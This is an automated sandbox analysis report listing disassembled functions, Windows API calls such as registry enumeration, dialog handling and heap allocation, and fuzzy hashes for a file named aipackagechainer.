Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 4530d4ff8280ea15380de07c1fcdada5e2171e598de72b4697393fa9984003e5
Instruction ID: 66faf62b274baf668b6914fce698e98174e0d48bb31b60ec34e6a882a4862a8a
Opcode Fuzzy Hash: 4530d4ff8280ea15380de07c1fcdada5e2171e598de72b4697393fa9984003e5
Instruction Fuzzy Hash: 95B012A1299031EE314493543E0AE3F119CC3C4B10330802EF001D4081D9410C210072

Function 000C9AFA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 12790cbeac4efced9aadd9b3c4938b00140034eb2a1f7052e016b39bdf96d43a
Instruction ID: fe6334af3f50b78dbc50004b6727a52d62492a38c47d64994523f13893f4e0f5
Opcode Fuzzy Hash: 12790cbeac4efced9aadd9b3c4938b00140034eb2a1f7052e016b39bdf96d43a
Instruction Fuzzy Hash: 09B01291299031EE310493643D0AE3F115CC3C4B50330801EF401D4081DA400C200072

Function 000C9AF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: aa306df16ee6cbff3400aaed82528e86399aa4c1607077b9228fc87c174f9416
Instruction ID: f96126473c9bb5d8d34daaef3598405c84be3ba005c84ea0253a5a89685d4468
Opcode Fuzzy Hash: aa306df16ee6cbff3400aaed82528e86399aa4c1607077b9228fc87c174f9416
Instruction Fuzzy Hash: 60B01291299131EE310493543D0AE3F119CC3C4B10330411EF001D4081D9510C600072

Function 000C9B04 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: baab6c9b3e776a15bae216ffc6b259eede3d99a17e844c07bd7e1c5538e97d71
Instruction ID: 45cd31dff967794c86613eae3f273321fb6669f2f313ce0df82ddab69c006c4e
Opcode Fuzzy Hash: baab6c9b3e776a15bae216ffc6b259eede3d99a17e844c07bd7e1c5538e97d71
Instruction Fuzzy Hash: 34B012916AA031EE310493543D0BE3F111CD7C4B10330401EF001D4081D9400C200073

Function 000C9AE1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: f9f3648afaaf472818b17a2c04da20e60d1347441c1580b29fbdf27ef4ea64da
Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
Opcode Fuzzy Hash: f9f3648afaaf472818b17a2c04da20e60d1347441c1580b29fbdf27ef4ea64da
Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6

Function 000C9B1D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 74658f78c17b235db855615f642632796c57ba3512d90afdf1b19f4e4d3f30e5
Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
Opcode Fuzzy Hash: 74658f78c17b235db855615f642632796c57ba3512d90afdf1b19f4e4d3f30e5
Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6

Function 000C9B13 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: dbd46aa9d07e08f5ee2cbbd8dfbc596cde020214b0b01b793f5b2117e05a4105
Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
Opcode Fuzzy Hash: dbd46aa9d07e08f5ee2cbbd8dfbc596cde020214b0b01b793f5b2117e05a4105
Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6

Function 000C9B27 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 000C9A97

Part of subcall function 000C9DEC: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000C9DF7
Part of subcall function 000C9DEC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000C9E5F
Part of subcall function 000C9DEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000C9E70

Strings

hu, xrefs: 000C9A91

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: hu
API String ID: 697777088-423011080
Opcode ID: 2c4a4c1de54f8b30b085dde80dba8c1331855f4f9bbb16e80ea3f5c9d69398d7
Instruction ID: 60e573b34a3983083e7c61b8c8810ab22587a329d93e43b77ec0bc88f3af95dc
Opcode Fuzzy Hash: 2c4a4c1de54f8b30b085dde80dba8c1331855f4f9bbb16e80ea3f5c9d69398d7
Instruction Fuzzy Hash: A3A001A66A9126FE7518A3A17D0AE7F122CD6C8B61330891EF40298092A9811C6550B6

Function 0009C6F1 Relevance: 3.3, APIs: 2, Instructions: 267registryCOMMON

Download Yara Rule

APIs

RegEnumValueA.KERNELBASE(?,?,?,?,00000000,?,00000000,?,D11C52E5), ref: 0009C78E
RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?,?), ref: 0009C7BA

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Part of subcall function 0006C7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,?,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C7DD
Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C80E
Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000,?,8000000B,D11C52E5,?,?), ref: 0006C845

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ByteCharEnumMultiValueWide$FindHeapProcessResource
String ID:
API String ID: 4070800961-0
Opcode ID: 2f31d91a495a32ee701e0f51754d6c65e72caa89fe5c1fdfa6c075998f6ee8e6
Instruction ID: 08aeec4b65c81cca5f621edc951df43426f9dac3e30ac82a2fe6186e4ca7cee2
Opcode Fuzzy Hash: 2f31d91a495a32ee701e0f51754d6c65e72caa89fe5c1fdfa6c075998f6ee8e6
Instruction Fuzzy Hash: FEA16D71900149DFDB04DFA8C884BEEBBF9FF48310F148169E915AB292DB349E04CBA1

Function 000A84F0 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 000A8542
EndDialog.USER32(00000000,00000001), ref: 000A8551

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: DialogWindow
String ID:
API String ID: 2634769047-0
Opcode ID: e1b7d7ff9d06815b3a4401743323f5100bdb8feb0b4c31cebc01c290551f343c
Instruction ID: a7ddd3388331c933f14aec004aff0bcc61cba43978faffa5d7659385a71f4389
Opcode Fuzzy Hash: e1b7d7ff9d06815b3a4401743323f5100bdb8feb0b4c31cebc01c290551f343c
Instruction Fuzzy Hash: 1C617A30901B89DFE711CFA8C948B8AFBF4BF4A310F14C6A9D445DB2A1DB749A44CB91

Function 00098230 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000000), ref: 000982A1

Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 000A7B74
Part of subcall function 000A7B30: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000A7B7F

Part of subcall function 00098500: GetDlgItem.USER32(?,00000002), ref: 00098520
Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098536
Part of subcall function 00098500: ShowWindow.USER32(00000000,00000000,?,?,?,?,0009717A), ref: 0009854F
Part of subcall function 00098500: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0009717A), ref: 0009855A
Part of subcall function 00098500: GetDlgItem.USER32(00000000,000003E9), ref: 0009856C
Part of subcall function 00098500: GetWindowRect.USER32(00000000,?), ref: 00098582
Part of subcall function 00098500: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0009717A), ref: 000985C5

Part of subcall function 00098930: GetWindowLongW.USER32(?,000000F0), ref: 00098977
Part of subcall function 00098930: GetParent.USER32(00000000), ref: 0009898A
Part of subcall function 00098930: GetWindowRect.USER32(?,?), ref: 000989AB
Part of subcall function 00098930: GetWindowLongW.USER32(00000000,000000F0), ref: 000989BE
Part of subcall function 00098930: MonitorFromWindow.USER32(?,00000002), ref: 000989D6
Part of subcall function 00098930: GetMonitorInfoW.USER32(00000000,?), ref: 000989EC

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$ItemLongMessageMonitorSend$EnableFromInfoInvalidateParentShow
String ID:
API String ID: 2603943895-0
Opcode ID: a25c7e87c5dd21f19cfd77a8c66a4790c3b3e71b30d2b81af139d1591751696e
Instruction ID: 098f8a0151bcdb7c1f57b5d63c418c9d48220f9763eea66ac9623740045bf459
Opcode Fuzzy Hash: a25c7e87c5dd21f19cfd77a8c66a4790c3b3e71b30d2b81af139d1591751696e
Instruction Fuzzy Hash: 091104726105095BEB209F08EC06BEA7794EB56320F008223FC05C7791DBB5EC65EBE5

Function 000A7B30 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00087860: LoadLibraryW.KERNEL32(ComCtl32.dll,D11C52E5,?,00000000,00000000), ref: 0008789E
Part of subcall function 00087860: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 000878C1
Part of subcall function 00087860: FreeLibrary.KERNEL32(00000000), ref: 0008793F

Part of subcall function 00087860: GetSystemMetrics.USER32(0000000C), ref: 000878FC
Part of subcall function 00087860: GetSystemMetrics.USER32(0000000B), ref: 00087912
Part of subcall function 00087860: LoadImageW.USER32(?,?,00000001,00000000,00000000,?), ref: 00087921

SendMessageW.USER32(?,00000080,00000001,00000000), ref: 000A7B74
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000A7B7F

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoadMessageMetricsSendSystem$AddressFreeImageProc
String ID:
API String ID: 852476325-0
Opcode ID: 9cc751d1193d7f64e775cb1247048e85a4b9c6687fa1b2a37ba6382087537c4e
Instruction ID: a927765f1e71be3e7b3f3e26a917ad3da264748cb6854e408866400432315af6
Opcode Fuzzy Hash: 9cc751d1193d7f64e775cb1247048e85a4b9c6687fa1b2a37ba6382087537c4e
Instruction Fuzzy Hash: F6F0303178521C37F660215A5C4BF67B64DE781B64F244276FA98AB3D2ECC67C0043D8

Function 000840A0 Relevance: 2.6, APIs: 2, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840B8
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,D11C52E5,-00000001,?,?,?,0009124D,0010ED54,?,?,?,?,00000000), ref: 000840EA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 8920bce0894b6656323e010f70b6d1b6862cbe135b127f76559f0d1b958f8b1f
Instruction ID: 0ede13f0b2929367b42ab8cff03cf8b6626a206b9e8f9ce7b7dc5bfa7f590b4d
Opcode Fuzzy Hash: 8920bce0894b6656323e010f70b6d1b6862cbe135b127f76559f0d1b958f8b1f
Instruction Fuzzy Hash: FF01D635301512AFEA109B59DC8DF5EB796EF94361F20412AF3159B2D0CF606C518790

Function 00079D20 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,D11C52E5,?,?,000EFF5D,000000FF), ref: 00079D54

Part of subcall function 00077790: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00077893

Part of subcall function 000CB520: GetCurrentThreadId.KERNEL32 ref: 000CB52C
Part of subcall function 000CB520: __Mtx_unlock.LIBCPMT ref: 000CB56B
Part of subcall function 000CB520: __Cnd_broadcast.LIBCPMT ref: 000CB573

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Cnd_broadcastCurrentFolderInitializeMtx_unlockPathThread
String ID:
API String ID: 3188518339-0
Opcode ID: 83a33c42d7406131d0bc8a75ef87e8dab1baada55c221cf67f6a31b5cc3e5271
Instruction ID: 05dfc6491fde56ddad65f1a4fecc182c3d0d9300cd4ab88f1df12468e304fe18
Opcode Fuzzy Hash: 83a33c42d7406131d0bc8a75ef87e8dab1baada55c221cf67f6a31b5cc3e5271
Instruction Fuzzy Hash: D621DC71A05704AFD720DF64CC01FAAB7E8EF09720F10852AFA299B691D774AC008B94

Function 000A0101 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000002), ref: 000A0133

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Dialog
String ID:
API String ID: 1120787796-0
Opcode ID: de8f4aa5b987ea08eeb44bf7f66f7d642ed292e5bb967a014a9a57a0dcb8b0b8
Instruction ID: ba3d659b782eacadea2c96c168058862ce7c695929cd2ee1294fe589e8a18395
Opcode Fuzzy Hash: de8f4aa5b987ea08eeb44bf7f66f7d642ed292e5bb967a014a9a57a0dcb8b0b8
Instruction Fuzzy Hash: BEF04970505300EFE728DF20D949FA6BBE2BF45709F14896DE4950BAA2C776EC01DB41

Function 0009C4E0 Relevance: 1.5, APIs: 1, Instructions: 46registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,0000000C), ref: 0009C552

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c4919ba99b62e7579423647dad236cdd2e5e152aae6207dedd04cd3846556f9d
Instruction ID: 4a0ebfc558ba02a071e7703cb249ac9717eaa16f06b90370b37db91c791fc93b
Opcode Fuzzy Hash: c4919ba99b62e7579423647dad236cdd2e5e152aae6207dedd04cd3846556f9d
Instruction Fuzzy Hash: FA019EB6904608BFE710CF44CD01F9AFBE8EB05724F10426AE914977D0D7F56914CB90

Function 000DDFCA Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000DD487,00000001,00000364,00000000,00000006,000000FF,?,000D719D,00000000,?,?,0009FC3D), ref: 000DE00B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 70ba317a710b8ce98177694ae5a6466b863d4f0ddc9fcd6c4c3bcef50d100de1
Instruction ID: 2523e7978d6c8891ae4e269f1a6299e1633a794ae68ee75ed5b82e78b7d971c0
Opcode Fuzzy Hash: 70ba317a710b8ce98177694ae5a6466b863d4f0ddc9fcd6c4c3bcef50d100de1
Instruction Fuzzy Hash: 6AF0B43160036567AB716B21DC0ABAA7BC89B52760B1C8123B808DE392CAA0DC41D2F0

Function 00063590 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000CE06E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,80004005,D11C52E5,?,00000000), ref: 000CE0CE

RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AllocateExceptionHeapRaise
String ID:
API String ID: 3789339297-0
